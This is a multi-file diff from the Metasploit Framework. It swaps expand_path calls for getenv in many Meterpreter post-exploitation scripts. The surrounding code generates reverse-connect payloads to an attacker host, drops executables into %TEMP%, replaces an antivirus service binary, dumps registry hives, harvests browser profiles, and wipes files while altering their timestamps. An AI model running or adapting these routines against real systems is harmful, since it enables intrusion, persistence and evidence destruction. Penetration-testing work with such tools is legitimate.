r = session.railgun.kernel32.CreateFileA(file, "GENERIC_WRITE", "FILE_SHARE_READ|FILE_SHARE_WRITE", nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH", 0)
handle=r['return']
real_size=size_on_disk(file)
@ -118,10 +118,10 @@ class Metasploit3 < Msf::Post
end
#http://msdn.microsoft.com/en-us/library/windows/desktop/aa365541(v=vs.85).aspx
client.railgun.kernel32.SetFilePointer(handle,0,nil,"FILE_BEGIN")
session.railgun.kernel32.SetFilePointer(handle,0,nil,"FILE_BEGIN")
#http://msdn.microsoft.com/en-us/library/windows/desktop/aa365747(v=vs.85).aspx
w=client.railgun.kernel32.WriteFile(handle,random,real_size,4,nil)
w=session.railgun.kernel32.WriteFile(handle,random,real_size,4,nil)
if w['return']==false
print_error("The was an error writing to disk, check permissions")
@ -131,7 +131,7 @@ class Metasploit3 < Msf::Post
print_status("#{w['lpNumberOfBytesWritten']} bytes overwritten")
end
client.railgun.kernel32.CloseHandle(handle)
session.railgun.kernel32.CloseHandle(handle)
change_mace(file)
#Generate a long random file name before delete it
@ -139,7 +139,7 @@ class Metasploit3 < Msf::Post
print_status("Changing file name")
#http://msdn.microsoft.com/en-us/library/windows/desktop/aa365239(v=vs.85).aspx
client.railgun.kernel32.MoveFileA(file,newname)
session.railgun.kernel32.MoveFileA(file,newname)
file_rm(newname)
print_good("File erased!")
@ -148,7 +148,7 @@ class Metasploit3 < Msf::Post
#Check if the file is encrypted or compressed
def comp_encr(file)
#http://msdn.microsoft.com/en-us/library/windows/desktop/aa364944(v=vs.85).aspx
handle=client.railgun.kernel32.GetFileAttributesA(file)
handle=session.railgun.kernel32.GetFileAttributesA(file)
type= handle['return']
#FILE_ATTRIBUTE_COMPRESSED=0x800

View File

@ -61,7 +61,7 @@ def enum_users(os)
user = @client.sys.config.getuid
userpath = nil
useroffcpath = nil
sysdrv = @client.fs.file.expand_path("%SystemDrive%")
sysdrv = @client.sys.config.getenv('SystemDrive')
if os =~ /Windows 7|Vista|2008/
userpath = sysdrv + "\\Users\\"
lnkpath = "\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\"
@ -83,7 +83,7 @@ def enum_users(os)
users << userinfo
end
else
uservar = @client.fs.file.expand_path("%USERNAME%")
uservar = @client.sys.config.getenv('USERNAME')
userinfo['username'] = uservar
userinfo['userpath'] = userpath + uservar + lnkpath
userinfo['useroffcpath'] = userpath + uservar + officelnkpath

View File

@ -89,7 +89,7 @@ if client.platform =~ /win32|win64/
#
# Upload to the filesystem
#
tempdir = client.fs.file.expand_path("%TEMP%")
tempdir = client.sys.config.getenv('TEMP')
tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
tempexe.gsub!("\\\\", "\\")

View File

@ -195,7 +195,7 @@ host = session.session_host
@log_dir = File.join(Msf::Config.log_directory, "scripts", "enum_chrome", Rex::FileUtils.clean_path(@host_info['Computer']), Time.now.strftime("%Y%m%d.%H%M"))
::FileUtils.mkdir_p(@log_dir)
sysdrive = client.fs.file.expand_path("%SYSTEMDRIVE%")
sysdrive = client.sys.config.getenv('SYSTEMDRIVE')
os = @host_info['OS']
if os =~ /(Windows 7|2008|Vista)/
@profiles_path = sysdrive + "\\Users\\"
@ -218,7 +218,7 @@ if is_system?
print_status "users found: #{usernames.join(", ")}"
else
print_status "running as user '#{uid}'..."
usernames << client.fs.file.expand_path("%USERNAME%")
usernames << client.sys.config.getenv('USERNAME')
prepare_railgun
end

View File

@ -251,8 +251,9 @@ if client.platform =~ /win32|win64/
if frfxchk
user = @client.sys.config.getuid
if not is_system?
usrname = Rex::FileUtils.clean_path(@client.fs.file.expand_path("%USERNAME%"))
db_path = @client.fs.file.expand_path("%APPDATA%") + "\\Mozilla\\Firefox\\Profiles"
envs = @client.sys.config.getenvs('USERNAME', 'APPDATA')
usrname = envs['USERNAME']
db_path = envs['APPDATA'] + "\\Mozilla\\Firefox\\Profiles"
if kill_frfx
kill_firefox
end

View File

@ -22,7 +22,7 @@ def enum_users
users = []
user = @client.sys.config.getuid
path4users = ""
sysdrv = @client.fs.file.expand_path("%SystemDrive%")
sysdrv = @client.sys.config.getenv('SystemDrive')
if os =~ /Windows 7|Vista|2008/
path4users = sysdrv + "\\Users\\"
@ -43,7 +43,7 @@ def enum_users
end
else
userinfo = {}
uservar = @client.fs.file.expand_path("%USERNAME%")
uservar = @client.sys.config.getenv('USERNAME')
userinfo['username'] = uservar
userinfo['userappdata'] = path4users + uservar + profilepath
users << userinfo
@ -83,7 +83,7 @@ def enum_powershell
end
if powershell_version =~ /2./
print_status("Powershell Modules:")
powershell_module_path = @client.fs.file.expand_path("%PSModulePath%")
powershell_module_path = @client.sys.config.getenv('PSModulePath')
@client.fs.dir.foreach(powershell_module_path) do |m|
next if m =~ /^(\.|\.\.)$/
print_status("\t#{m}")

View File

@ -223,7 +223,7 @@ def enum_users
users = []
user = @client.sys.config.getuid
path4users = ""
sysdrv = @client.fs.file.expand_path("%SystemDrive%")
sysdrv = @client.sys.config.getenv('SystemDrive')
if os =~ /7|Vista|2008/
path4users = sysdrv + "\\users\\"
@ -244,7 +244,7 @@ def enum_users
end
else
userinfo = {}
uservar = @client.fs.file.expand_path("%USERNAME%")
uservar = @client.sys.config.getenv('USERNAME')
userinfo['username'] = uservar
userinfo['userappdata'] = path4users + uservar + profilepath
users << userinfo

View File

@ -18,13 +18,12 @@ def list_env_vars(var_names)
"Name",
"Value"
])
var_names.flatten.each do |v|
tbl << [v,@client.fs.file.expand_path("\%#{v}\%")]
@client.sys.config.getenvs(*var_names.flatten).each do |k, v|
tbl << [k, v]
end
print("\n" + tbl.to_s + "\n")
end
opts.parse(args) { |opt, idx, val|
case opt
when "-h"

View File

@ -114,7 +114,7 @@ def enum_users(os)
users = []
path4users = ""
sysdrv = @client.fs.file.expand_path("%SystemDrive%")
sysdrv = @client.sys.config.getenv('SystemDrive')
if os =~ /7|Vista|2008/
path4users = sysdrv + "\\users\\"
@ -135,7 +135,7 @@ def enum_users(os)
end
else
userinfo = {}
uservar = @client.fs.file.expand_path("%USERNAME%")
uservar = @client.sys.config.getenv('USERNAME')
userinfo['username'] = uservar
userinfo['userappdata'] = path4users + uservar + path2purple
users << userinfo

View File

@ -145,7 +145,7 @@ def enum_users(os)
users = []
path4users = ""
sysdrv = @client.fs.file.expand_path("%SystemDrive%")
sysdrv = @client.sys.config.getenv('SystemDrive')
if os =~ /Windows 7|Vista|2008/
path4users = sysdrv + "\\users\\"
@ -166,7 +166,7 @@ def enum_users(os)
end
else
userinfo = {}
uservar = @client.fs.file.expand_path("%USERNAME%")
uservar = @client.sys.config.getenv('USERNAME')
userinfo['username'] = uservar
userinfo['userappdata'] = path4users + uservar + path2purple
users << userinfo

View File

@ -301,7 +301,7 @@ def checkdep(session)
tmpout = ""
depmode = ""
# Expand environment %TEMP% variable
tmp = session.fs.file.expand_path("%TEMP%")
tmp = session.sys.config.getenv('TEMP')
# Create random name for the wmic output
wmicfile = sprintf("%.5d",rand(100000))
wmicout = "#{tmp}\\#{wmicfile}"

View File

@ -30,7 +30,7 @@ end
record = ""
#Set path to the hosts file
hosts = session.fs.file.expand_path("%SYSTEMROOT%")+"\\System32\\drivers\\etc\\hosts"
hosts = session.sys.config.getenv('SYSTEMROOT')+"\\System32\\drivers\\etc\\hosts"
#Function check if UAC is enabled
def checkuac(session)
winver = session.sys.config.sysinfo

View File

@ -69,16 +69,15 @@ elsif client.platform =~ /win32|win64/
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
# Change to our working directory.
workingdir = client.fs.file.expand_path("%ProgramFiles%")
client.fs.dir.chdir(workingdir + "\\Panda Software\\Panda Antivirus 2007\\")
workingdir = client.sys.config.getenv('ProgramFiles') + "\\Panda Software\\Panda Antivirus 2007\\"
client.fs.dir.chdir(workindir)
# Create a backup of the original exe.
print_status("Creating a copy of PAVSRV51 (PAVSRV51_back.EXE)...")
client.sys.process.execute("cmd.exe /c rename PAVSRV51.EXE PAVSRV51_back.EXE", nil, {'Hidden' => 'true'})
# Place our newly created exe with the orginal binary name.
tempdir = client.fs.file.expand_path("%ProgramFiles%")
tempexe = tempdir + "\\Panda Software\\Panda Antivirus 2007\\" + "PAVSRV51.EXE"
tempexe = workingdir + "PAVSRV51.EXE"
print_status("Sending EXE payload '#{tempexe}'.")
fd = client.fs.file.new(tempexe, "wb")

View File

@ -106,7 +106,7 @@ def write_script_to_target(target_dir,vbs)
if target_dir
tempdir = target_dir
else
tempdir = @client.fs.file.expand_path("%TEMP%")
tempdir = @client.sys.config.getenv('TEMP')
end
tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
fd = @client.fs.file.new(tempvbs, "wb")

View File

@ -70,7 +70,7 @@ if client.platform =~ /win32|win64/
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
# Place our newly created exe in %TEMP%
tempdir = client.fs.file.expand_path("%TEMP%")
tempdir = client.sys.config.getenv('TEMP')
tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
print_status("Sending EXE payload '#{tempexe}'.")
fd = client.fs.file.new(tempexe, "wb")

View File

@ -19,7 +19,7 @@ require 'digest/sha1'
"-l" => [ false, "Download Prefetch Folder Analysis Log"]
)
@tempdir = @session.fs.file.expand_path("%TEMP%")
@tempdir = @session.sys.config.getenv('TEMP')
#---------------------------------------------------------------------------------------------------------
def read_program_list

View File

@ -57,7 +57,7 @@ def wmicexec(session,wmic,user,pass,trgt)
runfail = 0
runningas = session.sys.config.getuid
begin
tmp = session.fs.file.expand_path("%TEMP%")
tmp = session.sys.config.getenv('TEMP')
# Temporary file on windows host to store results
wmicfl = tmp + "\\wmictmp#{rand(100000)}.txt"

View File

@ -179,7 +179,7 @@ end
#---------------------------------------------------------------------------------------------------------
def upload(session,file)
location = session.fs.file.expand_path("%TEMP%")
location = session.sys.config.getenv('TEMP')
fileontrgt = "#{location}\\svhost#{rand(100)}.exe"
print_status("Uploading #{file}....")
session.fs.file.upload_file("#{fileontrgt}","#{file}")

View File

@ -99,6 +99,10 @@ upload_fn = nil
end
}
envs = session.sys.config.getenvs('SystemRoot', 'TEMP')
sysdir = envs['SystemRoot']
tmpdir = envs['TEMP']
# Must have at least one of -c or -u
if not cmd and not upload_fn
print_status("Using default reverse-connect meterpreter payload; -c or -u not specified")
@ -110,9 +114,8 @@ if not cmd and not upload_fn
raw = pay.generate
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
#and placing it on the target in %TEMP%
tempdir = client.fs.file.expand_path("%TEMP%")
tempexename = Rex::Text.rand_text_alpha(rand(8)+6)
cmd = tempdir + "\\" + tempexename + ".exe"
cmd = tmpdir + "\\" + tempexename + ".exe"
print_status("Preparing connect back payload to host #{rhost} and port #{rport} at #{cmd}")
fd = client.fs.file.new(cmd, "wb")
fd.write(exe)
@ -139,8 +142,6 @@ end
#
# Upload the payload command if needed
#
sysdir = session.fs.file.expand_path("%SystemRoot%")
tmpdir = session.fs.file.expand_path("%TEMP%")
if upload_fn
begin
location = tmpdir.dup

View File

@ -73,7 +73,7 @@ logs = ::File.join(Msf::Config.log_directory, 'scripts','scraper', host + "_" +
unsupported if client.platform !~ /win32|win64/i
begin
tmp = client.fs.file.expand_path("%TEMP%")
tmp = client.sys.config.getenv('TEMP')
print_status("Gathering basic system information...")

View File

@ -51,6 +51,10 @@ opts.parse(args) do |opt, idx, val|
end
end
envs = client.sys.config.getenvs('TEMP', 'SYSTEMROOT')
tempdir = envs['TEMP']
sysdir = envs['SYSTEMROOT']
# Get the exe payload.
pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
pay.datastore['LHOST'] = rhost
@ -58,9 +62,8 @@ pay.datastore['LPORT'] = rport
raw = pay.generate
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
#and placing it on the target in %TEMP%
tempdir = client.fs.file.expand_path("%TEMP%")
tempexename = Rex::Text.rand_text_alpha((rand(8)+6))
tempexe = tempdir + "\\" + tempexename + ".exe"
tempexe = "#{tempdir}\\#{tempexename}.exe"
print_status("Preparing connect back payload to host #{rhost} and port #{rport} at #{tempexe}")
fd = client.fs.file.new(tempexe, "wb")
fd.write(exe)
@ -129,7 +132,7 @@ service_list.each do |serv|
moved = false
configed = false
#default path, but there should be an ImagePath registry key
source = client.fs.file.expand_path("%SYSTEMROOT%\\system32\\#{serv}.exe")
source = "#{sysdir}\\system32\\#{serv}.exe")
#get path to exe; parse out quotes and arguments
sourceorig = registry_getvaldata("#{serviceskey}\\#{serv}","ImagePath").to_s
sourcemaybe = client.fs.file.expand_path(sourceorig)

View File

@ -87,7 +87,7 @@ client.sys.process.get_processes().each do |m|
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
# Place our newly created exe in %TEMP%
tempdir = client.fs.file.expand_path("%TEMP%")
tempdir = client.sys.config.getenv('TEMP')
tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
print_status("Sending EXE payload '#{tempexe}'.")
fd = client.fs.file.new(tempexe, "wb")

View File

@ -23,7 +23,7 @@ def upload(session,file,trgloc = "")
raise "File to Upload does not exists!"
else
if trgloc == ""
location = session.fs.file.expand_path("%TEMP%")
location = session.sys.config.getenv('TEMP')
else
location = trgloc
end

View File

@ -32,7 +32,7 @@ def upload(session,file,trgloc)
if not ::File.exists?(file)
raise "File to Upload does not exists!"
else
@location = session.fs.file.expand_path("%TEMP%")
@location = session.sys.config.getenv('TEMP')
begin
ext = file.scan(/\S*(.exe)/i)
if ext.join == ".exe"

View File

@ -152,7 +152,7 @@ else
#
# Upload to the filesystem
#
tempdir = client.fs.file.expand_path("%TEMP%")
tempdir = client.sys.config.getenv('TEMP')
tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
tempexe.gsub!("\\\\", "\\")

View File

@ -87,7 +87,7 @@ def upload(client,file,trgloc = nil)
raise "File to Upload does not exists!"
else
if trgloc == nil
location = client.fs.file.expand_path("%TEMP%")
location = client.sys.config.getenv('TEMP')
else
location = trgloc
end

View File

@ -264,7 +264,7 @@ def wmicexec(wmiccmds= nil)
@client.response_timeout=120
begin
tmp = @client.fs.file.expand_path("%TEMP%")
tmp = @client.sys.config.getenv('TEMP')
wmiccmds.each do |wmi|
if i < 10
@ -409,7 +409,7 @@ end
def chmace(cmds)
windir = ''
print_status("Changing Access Time, Modified Time and Created Time of Files Used")
windir = @client.fs.file.expand_path("%WinDir%")
windir = @client.sys.config.getenv('WinDir')
cmds.each do |c|
begin
@client.core.use("priv")
@ -430,7 +430,7 @@ def regdump(pathoflogs,filename)
#This variable will only contain garbage, it is to make sure that the channel is not closed while the reg is being dumped and compress
garbage = ''
hives = %w{HKCU HKLM HKCC HKCR HKU}
windir = @client.fs.file.expand_path("%WinDir%")
windir = @client.sys.config.getenv('WinDir')
print_status('Dumping and Downloading the Registry')
hives.each do |hive|
begin

View File

@ -22,7 +22,7 @@ def wmicexec(session,wmiccmds= nil)
tmpout = ''
session.response_timeout=120
begin
tmp = session.fs.file.expand_path("%TEMP%")
tmp = session.sys.config.getenv('TEMP')
wmicfl = tmp + "\\"+ sprintf("%.5d",rand(100000))
wmiccmds.each do |wmi|
print_status "running command wmic #{wmi}"